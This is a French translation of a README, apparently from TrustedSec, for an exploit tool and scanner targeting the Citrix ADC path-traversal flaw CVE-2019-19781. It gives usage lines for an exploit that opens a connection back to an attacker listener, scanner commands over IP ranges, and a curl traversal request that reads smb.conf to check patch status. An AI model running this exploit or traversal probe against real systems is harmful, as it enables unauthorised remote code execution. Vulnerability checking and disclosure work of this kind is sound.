
Ceci est un outil publié pour la vulnérabilité Citrix ADC (NetScaler). Nous ne divulguons ceci que parce que d'autres ont publié le code d'exploitation en premier.
Ceci a été téléchargé uniquement parce que d'autres chercheurs ont publié leur code en premier. Nous aurions aimé que cela reste caché un peu plus longtemps pendant que les défenseurs avaient suffisamment de temps pour corriger leurs systèmes.
Nous sommes tous pour la divulgation responsable, dans ce cas - le chat était déjà sorti du sac.
Exploits: CVE-2019-19781
root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py
Citrixmash v0.1 - Exploite le bug de traversée de répertoire Citrix : CVE-2019-19781 Outil écrit par : Rob Simon et Dave Kennedy Contributions : L'équipe TrustedSec Site Web : https://www.trustedsec.com INFO : https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ Forensics et IOC : https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/
Cet outil exploite un bug de traversée de répertoire dans Citrix ADC (NetScaler) qui appelle un script Perl utilisé pour ajouter des fichiers au format XML sur la machine victime. Cela permet à son tour une exécution de code à distance.
Assurez-vous de nettoyer ces deux emplacements de fichiers : /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
Notez que les noms d'hôte DNS et les adresses IP sont pris en charge dans les champs victimaddress et attackerip_listener.
Utilisation :
python citrixmash.py <attackerip_listener> <attacker_port>
usage: citrixmash.py [-h] target targetport attackerip attackerport
Ceci est un test simple pour voir si le serveur est toujours vulnérable à CVE-2019-19781.
Utilisation : python3 cve-2019-19781.py
Notez que vous pouvez utiliser des notations CIDR telles que 192.168.1.1/24 ainsi que des noms d'hôte.
Il indiquera si le serveur est toujours vulnérable ou non. Vous ne pouvez traiter qu'un seul serveur à la fois.
CVE-2019-19781-Scanner Société : TrustedSec Écrit par : Dave Kennedy Cet outil vérifie si le système distant est toujours vulnérable à CVE-2019-19781. Il ne scanne qu'un seul hôte à la fois. Vous pouvez également utiliser des notations CIDR, par exemple : 192.168.1.1/24 Vous pouvez également utiliser des noms d'hôte au lieu d'adresses IP. Vous pouvez également utiliser un fichier contenant des adresses IP généré par un outil externe.
Exemple : python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 Exemple2 : python3 cve-2019-19781_scanner.py 192.168.1.1 443 Exemple3 : python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443 Exemple4 : python3 cve-2019-19781_scanner.py as15169 443 Exemple5 : python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose Exemple6 : python3 cve-2019-19781_scanner.py file:hostfile 443
Utilisation : python3 cve-2019-19781_scanner.py targetip targetport
usage: cve-2019-19781_scanner.py [-h] target targetport [verbose]
Si vous souhaitez tester si cette exposition est corrigée, utilisez la commande suivante :
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
Ou si vous utilisez une autorité de certification interne ou non publique, vous pouvez ignorer avec l'option --insecure
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
Un code 403 signifie que vous êtes corrigé, ou si cela renvoie un site Web Citrix et PAS le fichier smb.conf lui-même.
Si vous pouvez voir smb.conf, alors vous êtes vulnérable.
Pour installer les dépendances, vous devrez exécuter la commande ci-dessous.
pip3 install -r requirements.txt